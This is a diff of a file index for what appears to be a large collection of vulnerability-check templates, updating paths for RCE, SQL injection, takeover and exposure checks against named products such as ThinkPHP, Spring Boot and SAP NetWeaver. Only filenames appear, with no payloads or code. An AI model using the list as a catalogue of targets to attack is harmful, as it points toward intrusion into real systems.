./poc/remote_code_execution/seacms-v654-rce.yaml
@@ -84668,6 +84651,7 @@
./poc/remote_code_execution/shop-as-a-customer-for-woocommerce.yaml
./poc/remote_code_execution/showdoc-file-upload-rce-10225.yaml
./poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml
+./poc/remote_code_execution/showdoc-file-upload-rce-10227.yaml
./poc/remote_code_execution/showdoc-file-upload-rce-10228.yaml
./poc/remote_code_execution/showdoc-file-upload-rce.yaml
./poc/remote_code_execution/side-cart-woocommerce-2b1e94ad1063793b918ab053345de198.yaml
@@ -84676,7 +84660,7 @@
./poc/remote_code_execution/side-cart-woocommerce.yaml
./poc/remote_code_execution/simple-e-commerce-shopping-cart-7e2981ed79fe5531ebd17112083654eb.yaml
./poc/remote_code_execution/simple-e-commerce-shopping-cart.yaml
-./poc/remote_code_execution/simple-employee-rce-10280.yaml
+./poc/remote_code_execution/simple-employee-rce-10279.yaml
./poc/remote_code_execution/simple-employee-rce.yaml
./poc/remote_code_execution/simple-woocommerce-csv-loader-ad18054d9efe7d6c6e0c45866e8bcf30.yaml
./poc/remote_code_execution/simple-woocommerce-csv-loader.yaml
@@ -84722,14 +84706,15 @@
./poc/remote_code_execution/splash-popup-for-woocommerce.yaml
./poc/remote_code_execution/spon-ip-intercom-ping-rce.yaml
./poc/remote_code_execution/spon-ip-intercom-ping-rce.yml
-./poc/remote_code_execution/spon-ip-rce.yaml
+./poc/remote_code_execution/spon-ip-rce(1).yaml
+./poc/remote_code_execution/sponip-network-system-ping-rce-10421.yaml
./poc/remote_code_execution/sponip-network-system-ping-rce-10422.yaml
./poc/remote_code_execution/sponip-network-system-ping-rce-10423.yaml
./poc/remote_code_execution/springboot-h2-db-rce-10454.yaml
./poc/remote_code_execution/springboot-h2-db-rce-10455.yaml
./poc/remote_code_execution/springboot-h2-db-rce-10456.yaml
-./poc/remote_code_execution/springboot-h2-db-rce-10457.yaml
./poc/remote_code_execution/springboot-h2-db-rce-10458.yaml
+./poc/remote_code_execution/springboot-h2-db-rce.yaml
./poc/remote_code_execution/springboot-log4j-rce-10472.yaml
./poc/remote_code_execution/springboot-log4j-rce-10473.yaml
./poc/remote_code_execution/springboot-log4j-rce-10474.yaml
@@ -84809,7 +84794,6 @@
./poc/remote_code_execution/tamronos-iptv-rce.yml
./poc/remote_code_execution/tamronos-rce-10647.yaml
./poc/remote_code_execution/tamronos-rce-10648.yaml
-./poc/remote_code_execution/tamronos-rce-10649.yaml
./poc/remote_code_execution/tamronos-rce-10650.yaml
./poc/remote_code_execution/tamronos-rce-10651.yaml
./poc/remote_code_execution/terms-and-conditions-popup-for-woocommerce-055e1820b3e7ef430034aac2fbd3cb4b.yaml
@@ -84824,18 +84808,17 @@
./poc/remote_code_execution/thinkcmf-rce.yaml
./poc/remote_code_execution/thinkphp-2-rce-10738.yaml
./poc/remote_code_execution/thinkphp-2-rce-10739.yaml
-./poc/remote_code_execution/thinkphp-2-rce-10740.yaml
./poc/remote_code_execution/thinkphp-2-rce-10741.yaml
./poc/remote_code_execution/thinkphp-30-rce.yaml
./poc/remote_code_execution/thinkphp-50-rce.yaml
./poc/remote_code_execution/thinkphp-501-rce-10742.yaml
-./poc/remote_code_execution/thinkphp-501-rce-10743.yaml
+./poc/remote_code_execution/thinkphp-501-rce.yaml
./poc/remote_code_execution/thinkphp-5010-rce.yaml
./poc/remote_code_execution/thinkphp-5022-5129-rce.yaml
+./poc/remote_code_execution/thinkphp-5022-rce-10744.yaml
./poc/remote_code_execution/thinkphp-5022-rce-10745.yaml
./poc/remote_code_execution/thinkphp-5022-rce-10746.yaml
-./poc/remote_code_execution/thinkphp-5022-rce.yaml
-./poc/remote_code_execution/thinkphp-5023-rce-10748.yaml
+./poc/remote_code_execution/thinkphp-5022-rce-10747.yaml
./poc/remote_code_execution/thinkphp-5023-rce-10749.yaml
./poc/remote_code_execution/thinkphp-5023-rce-10750.yaml
./poc/remote_code_execution/thinkphp-5023-rce-10751.yaml
@@ -84905,12 +84888,13 @@
./poc/remote_code_execution/users-customers-import-export-for-wp-woocommerce.yaml
./poc/remote_code_execution/vcenter-rce.yaml
./poc/remote_code_execution/vercel-detect.yaml
-./poc/remote_code_execution/vercel-takeover-11001.yaml
+./poc/remote_code_execution/vercel-takeover-11000.yaml
./poc/remote_code_execution/vercel-takeover.yaml
./poc/remote_code_execution/visual-tools-dvr-rce-11031.yaml
./poc/remote_code_execution/visual-tools-dvr-rce-11032.yaml
./poc/remote_code_execution/visual-tools-dvr-rce.yaml
./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce-11034.yaml
+./poc/remote_code_execution/vmware-horizon-log4j-jndi-rce.yaml
./poc/remote_code_execution/vmware-horizon-log4j-rce.yaml
./poc/remote_code_execution/vmware-vcenter-cve-2021-21985-rce.yml
./poc/remote_code_execution/vmware-vcenter-log4j-jndi-rce-11050.yaml
@@ -84946,10 +84930,10 @@
./poc/remote_code_execution/webappick-product-feed-for-woocommerce.yaml
./poc/remote_code_execution/webmin-cve-2019-15107-rce.yml
./poc/remote_code_execution/webpack-sourcemap.yaml
-./poc/remote_code_execution/webui-rce-11170.yaml
./poc/remote_code_execution/webui-rce-11171.yaml
./poc/remote_code_execution/webui-rce-11172.yaml
./poc/remote_code_execution/webui-rce-11173.yaml
+./poc/remote_code_execution/webui-rce-11174.yaml
./poc/remote_code_execution/webui-rce.yaml
./poc/remote_code_execution/weight-based-shipping-for-woocommerce-03810ee843c54e70aa66a159f989ab60.yaml
./poc/remote_code_execution/weight-based-shipping-for-woocommerce.yaml
@@ -85710,13 +85694,12 @@
./poc/remote_code_execution/wordpress-rce-simplefilelist.yaml
./poc/remote_code_execution/wordpress-simplefilelist-rce.yaml
./poc/remote_code_execution/wordpress-woocommerce-listing-11338.yaml
-./poc/remote_code_execution/wordpress-woocommerce-listing-11339.yaml
./poc/remote_code_execution/wordpress-woocommerce-listing-11340.yaml
+./poc/remote_code_execution/wordpress-woocommerce-listing-11341.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli-1.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli-11342.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli-11343.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml
-./poc/remote_code_execution/wordpress-woocommerce-sqli-11345.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli-2.yaml
./poc/remote_code_execution/wordpress-woocommerce-sqli.yaml
./poc/remote_code_execution/wordpress-xmlrpc-brute-force.yaml
@@ -85773,6 +85756,7 @@
./poc/remote_code_execution/wp-ecommerce-shop-styling.yaml
./poc/remote_code_execution/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml
./poc/remote_code_execution/wp-force-ssl-8016151e9aade43a962c06ab9c46dfaf.yaml
+./poc/remote_code_execution/wp-force-ssl.yaml
./poc/remote_code_execution/wp-graphql-woocommerce-5e48b1d9464c6954c7f09642fd0e35aa.yaml
./poc/remote_code_execution/wp-graphql-woocommerce.yaml
./poc/remote_code_execution/wp-hubspot-woocommerce-5ea745cbaec9e5a0599bde7b2e42faf2.yaml
@@ -85796,8 +85780,8 @@
./poc/remote_code_execution/wp-woocommerce-email-verification-11618.yaml
./poc/remote_code_execution/wp-woocommerce-email-verification-11619.yaml
./poc/remote_code_execution/wp-woocommerce-email-verification-2.yaml
+./poc/remote_code_execution/wp-woocommerce-file-download-11620.yaml
./poc/remote_code_execution/wp-woocommerce-file-download-11621.yaml
-./poc/remote_code_execution/wp-woocommerce-file-download.yaml
./poc/remote_code_execution/wp-woocommerce-pdf-invoice-listing-11622.yaml
./poc/remote_code_execution/wp-woocommerce-quickbooks-24e0b26c242968cb290b2a8bf1d68029.yaml
./poc/remote_code_execution/wp-woocommerce-quickbooks-95df688c610b5a94c1c10c8d8b9ac0d6.yaml
@@ -85813,6 +85797,7 @@
./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml
./poc/remote_code_execution/xml-file-export-import-for-stampscom-and-woocommerce.yaml
./poc/remote_code_execution/yapi-rce-11724.yaml
+./poc/remote_code_execution/yapi-rce-11725.yaml
./poc/remote_code_execution/yapi-rce-11726.yaml
./poc/remote_code_execution/yapi-rce.yml
./poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml
@@ -86165,11 +86150,11 @@
./poc/ruby/rails-database-config-9803.yaml
./poc/ruby/rails-database-config-9804.yaml
./poc/ruby/rails-debug-mode-9805.yaml
-./poc/ruby/rails-debug-mode-9807.yaml
+./poc/ruby/rails-debug-mode-9806.yaml
./poc/ruby/rails-debug-mode.yaml
./poc/ruby/rails-routes-exposed.yaml
./poc/ruby/rails-secret-token-disclosure-9808.yaml
-./poc/ruby/rails-secret-token-disclosure-9809.yaml
+./poc/ruby/rails-secret-token-disclosure-9810.yaml
./poc/ruby/rails-secret-token-disclosure.yaml
./poc/ruby/rails-secret-token.yaml
./poc/ruby/rails6-xss-9797.yaml
@@ -86188,7 +86173,7 @@
./poc/ruby/xss-rails-post.yaml
./poc/samba/samba-config-9985.yaml
./poc/samba/samba-config-9986.yaml
-./poc/samba/samba-config-9987.yaml
+./poc/samba/samba-config.yaml
./poc/samba/samba-detect-9988.yaml
./poc/samba/samba-detect-9990.yaml
./poc/samba/samba-detect.yaml
@@ -86239,12 +86224,11 @@
./poc/sap/sap-netweaver-detect-10043.yaml
./poc/sap/sap-netweaver-detect-10044.yaml
./poc/sap/sap-netweaver-detect-10046.yaml
-./poc/sap/sap-netweaver-detect-10047.yaml
./poc/sap/sap-netweaver-detect-10048.yaml
./poc/sap/sap-netweaver-detect.yaml
./poc/sap/sap-netweaver-info-leak-10049.yaml
./poc/sap/sap-netweaver-info-leak-10050.yaml
-./poc/sap/sap-netweaver-info-leak-10052.yaml
+./poc/sap/sap-netweaver-info-leak-10051.yaml
./poc/sap/sap-netweaver-info-leak.yaml
./poc/sap/sap-netweaver-portal-10053.yaml
./poc/sap/sap-netweaver-portal-10054.yaml
@@ -86253,7 +86237,6 @@
./poc/sap/sap-netweaver-webgui-10056.yaml
./poc/sap/sap-netweaver-webgui-10057.yaml
./poc/sap/sap-netweaver-webgui-10059.yaml
-./poc/sap/sap-netweaver-webgui.yaml
./poc/sap/sap-netweaver-workflow-10060.yaml
./poc/sap/sap-netweaver-workflow-10061.yaml
./poc/sap/sap-netweaver-workflow.yaml
@@ -86262,13 +86245,11 @@
./poc/sap/sap-nw-abap-webgui.yaml
./poc/sap/sap-nw-abap.yaml
./poc/sap/sap-recon-detect-10062.yaml
-./poc/sap/sap-recon-detect-10063.yaml
./poc/sap/sap-recon-detect.yaml
./poc/sap/sap-redirect-10064.yaml
./poc/sap/sap-redirect-10065.yaml
./poc/sap/sap-redirect-10066.yaml
./poc/sap/sap-redirect-10067.yaml
-./poc/sap/sap-redirect.yaml
./poc/sap/sap-router-info-leak.yaml
./poc/sap/sap-router.yaml
./poc/sap/sap-spartacus.yaml
@@ -86281,11 +86262,12 @@
./poc/sap/sap-web-dispatcher-10078.yaml
./poc/sap/sap-web-dispatcher-admin-portal-10069.yaml
./poc/sap/sap-web-dispatcher-admin-portal-10070.yaml
+./poc/sap/sap-web-dispatcher-admin-portal-10071.yaml
./poc/sap/sap-web-dispatcher-admin-portal-10072.yaml
./poc/sap/sap-web-dispatcher-admin-portal-10073.yaml
./poc/sap/sap-web-dispatcher-admin-portal.yaml
./poc/sap/sapfiori-panel-1.yaml
-./poc/sap/sapfiori-panel-10034.yaml
+./poc/sap/sapfiori-panel-10033.yaml
./poc/sap/sapfiori-panel-2.yaml
./poc/sap/sapfiori-panel.yaml
./poc/sap/saphali-woocommerce-lite-f1a8989f3685644493e1506c7b69f933.yaml
@@ -86401,7 +86383,7 @@
./poc/search/ajax-search-pro-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/search/ajax-search-pro-plugin.yaml
./poc/search/ajax-search-pro.yaml
-./poc/search/aws-opensearch-login-650.yaml
+./poc/search/aws-opensearch-login-649.yaml
./poc/search/aws-opensearch-login.yaml
./poc/search/axublog_v1-search-sqli.yaml
./poc/search/better-search-162a0d80b5d220d9e37c3f6ae9fddb60.yaml
@@ -86507,6 +86489,7 @@
./poc/search/elasticsearch-insecure-default-config.yaml
./poc/search/elasticsearch-log4j.yaml
./poc/search/elasticsearch-sql-client-detect-7189.yaml
+./poc/search/elasticsearch-sql-client-detect-7190.yaml
./poc/search/elasticsearch-sql-client-detect-7191.yaml
./poc/search/elasticsearch-sql-client-detect-7192.yaml
./poc/search/elasticsearch-unauth.yaml
@@ -86639,7 +86622,6 @@
./poc/search/search-unleashed-43b47c7d41209b50fd68346a0295170e.yaml
./poc/search/search-unleashed.yaml
./poc/search/searchbar.yaml
-./poc/search/searches.yaml
./poc/search/searchiq-486b2d79f520ba9226667882d1e0c61d.yaml
./poc/search/searchiq-5009d6ede19c15ff2d2f30c18e0f60b2.yaml
./poc/search/searchiq-5f115235a8b59c98637592fa393641f7.yaml
@@ -86812,7 +86794,6 @@
./poc/sensitive/sensitive-storage-exposure-4.yaml
./poc/sensitive/sensitive-storage-exposure-5.yaml
./poc/sensitive/sensitive-storage-exposure-6.yaml
-./poc/sensitive/sensitive-storage-exposure.yaml
./poc/sensitive/sensitives.yaml
./poc/sensitive/typo3-sensitive-files.yaml
./poc/sensitive/wordpress-sensitive-config.yaml
@@ -86821,14 +86802,13 @@
./poc/sensitive/zenphoto-installation-sensitive-info-2.yaml
./poc/sensitive/zenphoto-installation-sensitive-info-3.yaml
./poc/sensitive/zenphoto-installation-sensitive-info-4.yaml
-./poc/sensitive/zenphoto-installation-sensitive-info.yaml
./poc/sensitive/zenphoto-sensitive-info-1.yaml
+./poc/sensitive/zenphoto-sensitive-info-11784.yaml
./poc/sensitive/zenphoto-sensitive-info-2.yaml
./poc/sensitive/zenphoto-sensitive-info-3.yaml
./poc/sensitive/zenphoto-sensitive-info-4.yaml
./poc/sensitive/zenphoto-sensitive-info.yaml
./poc/sharepoint/exposed-sharepoint-list-7344.yaml
-./poc/sharepoint/exposed-sharepoint-list-7345.yaml
./poc/sharepoint/exposed-sharepoint-list-7346.yaml
./poc/sharepoint/exposed-sharepoint-list-7347.yaml
./poc/sharepoint/microsoft-sharepoint.yaml
@@ -86841,17 +86821,15 @@
./poc/shopify/import-shopify-to-woocommerce.yaml
./poc/shopify/seoking-shopify-app.yaml
./poc/shopify/shopify-app-installer.yaml
-./poc/shopify/shopify-custom-token-10198.yaml
+./poc/shopify/shopify-custom-token(1).yaml
./poc/shopify/shopify-custom-token-11860.yaml
./poc/shopify/shopify-custom-token.yaml
./poc/shopify/shopify-legacy-private-app-token.yaml
./poc/shopify/shopify-private-token-10199.yaml
-./poc/shopify/shopify-private-token-11861.yaml
./poc/shopify/shopify-private-token.yaml
./poc/shopify/shopify-public-access.yaml
./poc/shopify/shopify-shared-secret-11862.yaml
./poc/shopify/shopify-shared-secret.yaml
-./poc/shopify/shopify-takeover-10201.yaml
./poc/shopify/shopify-takeover-10202.yaml
./poc/shopify/shopify-takeover-10203.yaml
./poc/shopify/shopify-takeover-10204.yaml
@@ -86879,7 +86857,7 @@
./poc/smtp/easy-wp-smtp-e105c23e6058137711e2a12fec6f051e.yaml
./poc/smtp/easy-wp-smtp-listing-7154.yaml
./poc/smtp/easy-wp-smtp-listing-7155.yaml
-./poc/smtp/easy-wp-smtp-listing-7157.yaml
+./poc/smtp/easy-wp-smtp-listing-7156.yaml
./poc/smtp/easy-wp-smtp-listing.yaml
./poc/smtp/easy-wp-smtp.yaml
./poc/smtp/esmtp-detect.yaml
@@ -86893,6 +86871,7 @@
./poc/smtp/fluent-smtp-9cf8fafd63ba25b0026079b7736ef163.yaml
./poc/smtp/fluent-smtp.yaml
./poc/smtp/msmtp-config-8966.yaml
+./poc/smtp/msmtp-config-8967.yaml
./poc/smtp/post-smtp-01bed4d8fc18f92e932ac3e1e0f4f5cb.yaml
./poc/smtp/post-smtp-1c60fa32acf2539fdc2944eaf19fbe1e.yaml
./poc/smtp/post-smtp-20b5a1223c8140b840ffff5422240c1d.yaml
@@ -87258,7 +87237,6 @@
./poc/social/facebook-phish.yaml
./poc/social/facebook-secret-7386.yaml
./poc/social/facebook-secret.yaml
-./poc/social/facebook-secrets.yaml
./poc/social/facebook-wall-and-social-integration-739e4454fbb308c937ef75bb1786deff.yaml
./poc/social/facebook-wall-and-social-integration.yaml
./poc/social/facebook.yaml
@@ -87312,7 +87290,7 @@
./poc/social/floating-social-media-links-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/social/floating-social-media-links-plugin.yaml
./poc/social/floating-social-media-links.yaml
-./poc/social/flow-flow-social-stream-xss.yaml
+./poc/social/flow-flow-social-stream-xss-7524.yaml
./poc/social/flow-flow-social-streams-0b11cbe599572e7479985362c28e5bab.yaml
./poc/social/flow-flow-social-streams-b2ca9c85649f9ca0a5356ebbebb714ec.yaml
./poc/social/flow-flow-social-streams-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -87418,7 +87396,6 @@
./poc/social/kiwi-social-share.yaml
./poc/social/lazy-facebook-comments-869b4c99b310f9132fffb57ed8a544a0.yaml
./poc/social/lazy-facebook-comments.yaml
-./poc/social/linkedin-id-11853.yaml
./poc/social/linkedin-id.yaml
./poc/social/linkedin-phish.yaml
./poc/social/linkedin.yaml
@@ -87504,10 +87481,10 @@
./poc/social/rimons-twitter-widget-8b341a5853c74db00a81c6612967b88a.yaml
./poc/social/rimons-twitter-widget.yaml
./poc/social/sassy-social-share-054e10a9454bde60b36d0b76ce12b2f2.yaml
+./poc/social/sassy-social-share-10083.yaml
./poc/social/sassy-social-share-10084.yaml
./poc/social/sassy-social-share-10085.yaml
./poc/social/sassy-social-share-10086.yaml
-./poc/social/sassy-social-share-10087.yaml
./poc/social/sassy-social-share-380a93a6eb0678027b6e7c5b3db32454.yaml
./poc/social/sassy-social-share-5d7eeac9d47ec654e4d9145037a7ff62.yaml
./poc/social/sassy-social-share-5d9f6b221c4bba02420d23f606a1608b.yaml
@@ -87521,6 +87498,7 @@
./poc/social/sassy-social-share-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/social/sassy-social-share-plugin.yaml
./poc/social/sassy-social-share-xss.yaml
+./poc/social/sassy-social-share.yaml
./poc/social/scriptless-social-sharing-e6bc780a169375a20634676d371e4d7b.yaml
./poc/social/scriptless-social-sharing.yaml
./poc/social/seed-social-2469f603fdf449edfed5d7210aa6c605.yaml
@@ -87997,11 +87975,11 @@
./poc/sql/74cms-show-sqli.yaml
./poc/sql/74cms-sqli-1.yaml
./poc/sql/74cms-sqli-1.yml
-./poc/sql/74cms-sqli-10.yaml
./poc/sql/74cms-sqli-2.yaml
./poc/sql/74cms-sqli-2.yml
./poc/sql/74cms-sqli-8.yaml
./poc/sql/74cms-sqli-9.yaml
+./poc/sql/74cms-sqli.yaml
./poc/sql/74cms-sqli.yml
./poc/sql/74cms_V3-plusa-sqli.yaml
./poc/sql/74cms_v4-register-sqli.yaml
@@ -90128,8 +90106,8 @@
./poc/sql/analytics-insights-a52a48fcebcdb3625a324cff9c9c4abe.yaml
./poc/sql/android-debug-database-exposed-312.yaml
./poc/sql/android-debug-database-exposed-313.yaml
+./poc/sql/android-debug-database-exposed-314.yaml
./poc/sql/android-debug-database-exposed-315.yaml
-./poc/sql/android-debug-database-exposed-316.yaml
./poc/sql/android-debug-database-exposed.yaml
./poc/sql/anfrageformular-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/animate-everything-6477bf18cad6c823db485408d49b337b.yaml
@@ -90145,7 +90123,8 @@
./poc/sql/apache-loadbalancer-364.yaml
./poc/sql/apache-loadbalancer-365.yaml
./poc/sql/apache-loadbalancer.yaml
-./poc/sql/api-abuseipdb-384.yaml
+./poc/sql/api-abuseipdb-385.yaml
+./poc/sql/api-abuseipdb.yaml
./poc/sql/api-dbt.yaml
./poc/sql/api-info-themes-plugins-wp-org-a5ba91db466ae424f41944b08096d121.yaml
./poc/sql/api2cart-bridge-connector-9310170fdba6634de0183ef1f76c24bb.yaml
@@ -90409,6 +90388,7 @@
./poc/sql/buddypress-media-09db3ed600715ed39882e0075ad496ac.yaml
./poc/sql/buddypress-sticky-post-65b7b523caeedbacbd14c75623fa6515.yaml
./poc/sql/buffer-my-post-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/buildbot-panel-803.yaml
./poc/sql/buildbot-panel.yaml
./poc/sql/buildbot-panel.yml
./poc/sql/builder-contact-05cefda973a9af46db8fb07d4529e095.yaml
@@ -90494,7 +90474,7 @@
./poc/sql/chamilo-lms-sqli-1.yaml
./poc/sql/chamilo-lms-sqli-2.yaml
./poc/sql/chamilo-lms-sqli-891.yaml
-./poc/sql/chamilo-lms-sqli-892.yaml
+./poc/sql/chamilo-lms-sqli.yaml
./poc/sql/change-default-login-logo-url-and-title-fef61a56dbdca375b6c1f6da9b2473d7.yaml
./poc/sql/change-login-logo-4238ce6d433fb89e975842e8fdb72cad.yaml
./poc/sql/change-prices-with-time-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
@@ -90504,6 +90484,7 @@
./poc/sql/changjet-tplus-keyinfolist-sqli.yaml
./poc/sql/chanjet-CRM-sqli.yaml
./poc/sql/chanjet-crm-get-usedspace-sql-injection.yaml
+./poc/sql/chanjet-crm-sqli.yaml
./poc/sql/chanjetcrm-sqli.yaml
./poc/sql/chanjettplus-sqli.yaml
./poc/sql/charitable-9df7e0ba5fda4510a23ec4adbc13841f.yaml
@@ -90691,10 +90672,11 @@
./poc/sql/couchdb-admin-party.yaml
./poc/sql/couchdb-adminparty-1235.yaml
./poc/sql/couchdb-adminparty-1236.yaml
+./poc/sql/couchdb-adminparty-1237.yaml
./poc/sql/couchdb-adminparty.yaml
./poc/sql/couchdb-cve-2017-12635.yml
./poc/sql/couchdb-detect.yaml
-./poc/sql/couchdb-exposure-1238.yaml
+./poc/sql/couchdb-exposure-1239.yaml
./poc/sql/couchdb-exposure-1240.yaml
./poc/sql/couchdb-exposure-1241.yaml
./poc/sql/couchdb-exposure.yaml
@@ -90826,13 +90808,14 @@
./poc/sql/date-time-picker-field-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/date-time-picker-field-f9e5579db8346e24e94a94b4128866ec.yaml
./poc/sql/db-backup-4ce5dcbee48b05bd3f2e0709e37bed82.yaml
-./poc/sql/db-backup-lfi-6774.yaml
+./poc/sql/db-backup-lfi-6775.yaml
./poc/sql/db-backup-lfi-6776.yaml
./poc/sql/db-backup-lfi.yaml
./poc/sql/db-backup.yaml
./poc/sql/db-schema-1.yaml
./poc/sql/db-schema-2.yaml
./poc/sql/db-schema-3.yaml
+./poc/sql/db-schema-6783.yaml
./poc/sql/db-schema-6784.yaml
./poc/sql/db-schema-6785.yaml
./poc/sql/dbapp-jumpserver-service-useradd.yaml
@@ -90841,7 +90824,6 @@
./poc/sql/dbeaver-credentials-6777.yaml
./poc/sql/dbeaver-credentials-6778.yaml
./poc/sql/dbeaver-credentials-6779.yaml
-./poc/sql/dbeaver-credentials-6780.yaml
./poc/sql/dbeaver-credentials-6781.yaml
./poc/sql/dbeaver-credentials-6782.yaml
./poc/sql/dbeaver-data-sources.yaml
@@ -90856,10 +90838,10 @@
./poc/sql/debug-log-manager-df86fb073cfdbcf3c878e8167244dee2.yaml
./poc/sql/dedecms-guestbook-sqli.yaml
./poc/sql/dedecms-guestbook-sqli.yml
+./poc/sql/dedecms-membergroup-sqli-6796.yaml
./poc/sql/dedecms-membergroup-sqli-6797.yaml
./poc/sql/dedecms-membergroup-sqli-6798.yaml
./poc/sql/dedecms-membergroup-sqli-6799.yaml
-./poc/sql/dedecms-membergroup-sqli.yaml
./poc/sql/dedecms-membergroup-sqli.yml
./poc/sql/defender-security-2020b15b8eb9ba5370b2afa3c6dbea78.yaml
./poc/sql/defender-security-89eba353f6f79e2d842308338b651ddb.yaml
@@ -90907,7 +90889,6 @@
./poc/sql/doneren-met-mollie-5892523ec2265ec2c4db0a351f404d23.yaml
./poc/sql/donorbox-donation-form-7e3cdcd7322fdba36cae6661c4404f33.yaml
./poc/sql/dotnetcms-sqli-7089.yaml
-./poc/sql/dotnetcms-sqli.yaml
./poc/sql/dotnetcms-sqli.yml
./poc/sql/download-from-files-a1fa06fbb5bc053d589b33ccdbbdc2f9.yaml
./poc/sql/download-manager-03951c916730f541db7606ebff038a6c.yaml
@@ -90956,7 +90937,9 @@
./poc/sql/dukapress-42d1930756a0a540db942aacdf5f0b12.yaml
./poc/sql/duomicms-sql-injection-7122.yaml
./poc/sql/duomicms-sql-injection-7123.yaml
+./poc/sql/duomicms-sql-injection-7124.yaml
./poc/sql/duomicms-sql-injection-7125.yaml
+./poc/sql/duomicms-sql-injection.yaml
./poc/sql/duomicms-sqli.yaml
./poc/sql/duomicms-sqli.yml
./poc/sql/duplicate-page-219a16f0f3edb724b96c66d462f64166.yaml
@@ -91056,6 +91039,7 @@
./poc/sql/ecology-oa-filedownloadforoutdoc-sqli.yaml
./poc/sql/ecology-sqli2.yaml
./poc/sql/ecology-syncuserinfo-sqli-7177.yaml
+./poc/sql/ecology-syncuserinfo-sqli.yaml
./poc/sql/ecology-syncuserinfo-sqli.yml
./poc/sql/ecology-v8-sqli.yaml
./poc/sql/ecology-v8-sqli.yml
@@ -91087,6 +91071,7 @@
./poc/sql/elasta-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/elasta-9437ebb08533440a4a517ccdbbdd6db9.yaml
./poc/sql/elasticsearch-sql-client-detect-7189.yaml
+./poc/sql/elasticsearch-sql-client-detect-7190.yaml
./poc/sql/elasticsearch-sql-client-detect-7191.yaml
./poc/sql/elasticsearch-sql-client-detect-7192.yaml
./poc/sql/elation-6477bf18cad6c823db485408d49b337b.yaml
@@ -91161,6 +91146,7 @@
./poc/sql/ethereumico-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/ethpress-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/etouch-v2-sqli-7265.yaml
+./poc/sql/etouch-v2-sqli-7266.yaml
./poc/sql/etouch-v2-sqli-7267.yaml
./poc/sql/etouch-v2-sqli-7268.yaml
./poc/sql/etouch-v2-sqli.yml
@@ -91200,6 +91186,7 @@
./poc/sql/export-to-text-862d66478661085dbcc88bd65de30940.yaml
./poc/sql/exposed-adb-7280.yaml
./poc/sql/exposed-adb-7281.yaml
+./poc/sql/exposed-adb-7282.yaml
./poc/sql/exposed-adb.yaml
./poc/sql/exposed-mysql-initial-7321.yaml
./poc/sql/exposed-mysql-initial-7322.yaml
@@ -91470,6 +91457,7 @@
./poc/sql/glorious-services-support-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/glorious-sites-installer-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/glossary-by-codeat-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/glpi-9.3.3-sql-injection.yaml
./poc/sql/gm-woo-product-list-widget-c7d55594227f574d6f5e336946adb772.yaml
./poc/sql/go-fetch-jobs-wp-job-manager-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/go-viral-6477bf18cad6c823db485408d49b337b.yaml
@@ -91772,7 +91760,6 @@
./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml
./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml
./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml
-./poc/sql/kevinlab-bems-sqli-8457.yaml
./poc/sql/kevinlab-bems-sqli-8458.yaml
./poc/sql/kevinlab-bems-sqli-8459.yaml
./poc/sql/kevinlab-bems-sqli-8460.yaml
@@ -91921,7 +91908,7 @@
./poc/sql/maxbuttons-a66a8a7e32b7fc1922165ddb61178156.yaml
./poc/sql/maz-loader-b1cca93f4b55112648ec98db79317e10.yaml
./poc/sql/mcms-list-do-sqli.yaml
-./poc/sql/mdb-database-file-8796.yaml
+./poc/sql/mdb-database-file-8795.yaml
./poc/sql/mdb-database-file.yaml
./poc/sql/mdc-private-message-4d8badd82549db37be67f8f9b51803eb.yaml
./poc/sql/media-download-6477bf18cad6c823db485408d49b337b.yaml
@@ -91994,13 +91981,13 @@
./poc/sql/moneymasters-02a4bc9438adbcdaa5664f021e38f12e.yaml
./poc/sql/moneytheme-0560e2fcc6071d361ddbd57a75ed8daf.yaml
./poc/sql/mongodb-detect-8919.yaml
+./poc/sql/mongodb-detect-8920.yaml
./poc/sql/mongodb-detect-8921.yaml
./poc/sql/mongodb-detect.yaml
./poc/sql/mongodb-info-enum.yaml
./poc/sql/mongodb-ops-manager-8923.yaml
./poc/sql/mongodb-ops-manager-8924.yaml
./poc/sql/mongodb-ops-manager.yaml
-./poc/sql/mongodb-unauth-8925.yaml
./poc/sql/mongodb-unauth-8926.yaml
./poc/sql/mongodb-unauth-8927.yaml
./poc/sql/mongodb-unauth-8928.yaml
@@ -92156,7 +92143,7 @@
./poc/sql/ocean-extra-6477bf18cad6c823db485408d49b337b.yaml
./poc/sql/odoo-database-manager-9202.yaml
./poc/sql/odoo-database-manager-9203.yaml
-./poc/sql/odoo-database-manager-9205.yaml
+./poc/sql/odoo-database-manager-9204.yaml
./poc/sql/odoo-database-manager.yaml
./poc/sql/off-canvas-sidebars-6ad11d341ff184481eedb5b9451b7483.yaml
./poc/sql/official-mailerlite-sign-up-forms-6707baefec25107b95f6524fdb5e747c.yaml
@@ -92171,8 +92158,8 @@
./poc/sql/ooorl-e3ffba36446f7dba2b794300461eb826.yaml
./poc/sql/open-external-links-in-a-new-window-65c98e7490918c36cf9db80ea2af7d28.yaml
